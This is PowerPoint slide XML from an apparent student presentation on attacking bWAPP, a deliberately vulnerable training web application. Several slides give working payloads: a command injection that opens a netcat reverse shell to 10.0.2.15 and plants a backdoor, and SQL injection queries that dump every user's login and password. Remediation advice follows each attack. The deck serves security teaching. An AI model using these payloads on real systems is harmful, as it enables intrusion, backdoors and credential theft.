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277" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="283" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="287" r:id="rId32"/>
    <p:sldId id="288" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="290" r:id="rId36"/>
    <p:sldId id="291" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="293" r:id="rId39"/>
    <p:sldId id="294" r:id="rId40"/>
    <p:sldId id="295" r:id="rId41"/>
    <p:sldId id="297"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91472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48104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614958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5665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4191899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931493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22574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199836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7573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261697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7C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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91053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49211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47C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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336785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47C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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79268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47C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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18701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440532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47C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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B931DC-CD46-4BDD-8F12-F25D287CA0C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153395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047C847-5275-4748-A6FE-C50C3D90A97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2025-01-13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B931DC-CD46-4BDD-8F12-F25D287CA0C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365717590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3791-A8BD-432C-A298-DC9103F3BEBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>QaSSTP presentation - bWapp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4528ABCE-D20F-D2CC-441A-FDE0F410283D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Terec Andrei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Popovici George-Ioan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pop David</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966057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B9CB36-9C5F-AD06-1D14-DB5C3CA37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68" y="564311"/>
            <a:ext cx="11450486" cy="5729377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85584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8C0591-6FF4-7B17-7FEB-1B3FA2FDE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27" y="761769"/>
            <a:ext cx="10676545" cy="5334462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269853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E5D774-CDCE-EEF6-E4D2-C6E9C9221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1" y="757958"/>
            <a:ext cx="10592718" cy="5342083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1468615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XSS</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To remediate, the user input should be sanitezed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>htmlspecialchars </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function or the entries from the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227759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This website sends a ping to the ip specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Because we don’t see the output of the command, we will try to inject a sleep command. If the website takes longer to responde, we know we successfully injected the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BFE15B-9959-A8E6-5C33-B8EA7834E693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2417007" y="4515216"/>
            <a:ext cx="5715798" cy="1724266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57412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This website sends a ping to the ip specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Because we don’t see the output of the command, we will try to inject a sleep command. If the website takes longer to responde, we know we successfully injected the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BFE15B-9959-A8E6-5C33-B8EA7834E693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2417007" y="4515216"/>
            <a:ext cx="5715798" cy="1724266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2034148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Now that we can send commands, we will get a reversed shell and install a backdoor. We will send the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="1"/>
              <a:t>127.0.0.1|nc 10.0.2.15 4747 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>And we will add a new endpoint at inserted_backdoor.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370271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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67B2B217-BEEF-8296-32BE-5667FC1D7260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2414328"/>
            <a:ext cx="12192000" cy="3727447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317994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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{648DB8D4-DE4A-C7C3-4675-5F36CF5BF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 y="2893593"/>
            <a:ext cx="12192000" cy="2022538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322763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2FB-2AF8-37E1-00BD-81748750A318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E16CCF9-EC92-7DCF-CFE7-2D75D66FB9A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>To remediate, the user input should be sanitezed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132743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48B3-8D98-C6E3-2044-9A4D38E8B659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bWapp project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741B0778-D3EE-5D8E-31C5-9C9D8305135B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bWAPP is a PHP application that uses a MySQL database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It can be hosted on Linux/Windows with Apache/IIS and MySQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438234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B51E-9468-41E5-CE31-CA84BE60E8BE}"/>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1A27C23D-793D-B80A-8FA3-600D3CFDEE8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this web app you can search for your favorite movie by title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will test if the site considers this input valid, which it will</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C924F58-0267-F7F7-2CC1-93A6D40EF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985" y="3800198"/>
            <a:ext cx="6820852" cy="1991003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82875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8A22-C5AA-26A0-B295-0F2B32786E8F}"/>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7A51C22D-492D-2CCF-EC87-C903F5548D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It does, since it did not specify that the search query is invalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we find out how many columns are in the table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{217DD51B-7D1E-A6B9-6C59-E0A5B53A0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637" y="4073147"/>
            <a:ext cx="4389913" cy="1375301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5962F95C-2B78-7ABB-9B4A-5B8BAF6B5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062" y="4073147"/>
            <a:ext cx="4370401" cy="1375301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373133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E3C08-7049-C317-DDED-6B0049449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B2968-354A-A2FE-FDA4-CB2EE570B160}"/>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BFA563CE-1C72-37FF-7E46-D4CA59F58049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we input this to show which columns of the table are represented on the site’s table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25564F6E-7328-4B63-31AA-12051CFFA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011" y="4020344"/>
            <a:ext cx="6982799" cy="2172003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2439166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15A1-676C-B564-F394-4280EBDE17A6}"/>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6CFAD1CC-3B59-221F-0E8F-78F202BBB969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we can get whatever we want from the database into one of the columns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC02CDF-B158-A931-47A5-76976242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27" y="3429000"/>
            <a:ext cx="6754168" cy="2057687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303851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4F42-2D2A-4CC4-6AAF-A48CAEF700C8}"/>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915D14B3-DF06-46BD-D5AA-447ACFB99D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>select GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,'\n') from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='BASE TABLE’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows all the tables of the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0EB7B3C-0AA5-CC9B-930B-38667F3E4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79" y="3911047"/>
            <a:ext cx="4299442" cy="2899218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2725799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EF37-973F-B2E8-1936-FE13ECA600FE}"/>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D122ACB2-2955-6AFA-2700-E92202490E40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>select GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,'\n') from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='users’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows the columns of the table “users”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6B9D62-BE85-7C20-3C36-3F9342632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222" y="3961680"/>
            <a:ext cx="5453555" cy="2737817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425284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352A-A8DD-FC89-C8B0-6A2575E0936B}"/>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6BEDF520-63D2-7570-1515-B68E1CDF6CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>select GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login,":",password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,"\n") from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows the login and password of all users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D4A7D3-E532-B8CA-1F46-6F4F085F8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0563" y="3846356"/>
            <a:ext cx="7487695" cy="2238687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2892615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3145-E58B-CE52-A30D-FAE05C169440}"/>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572267B2-793E-2EF1-55B2-79797D2B422A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two well-known methods to remediate this are using prepared statements with parametrized queries or properly constructed stored procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43949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8E5D-CD6E-F3DE-1B35-EFE1864BAF87}"/>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EDCA867F-C04D-B6DC-F908-298F47BB8241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
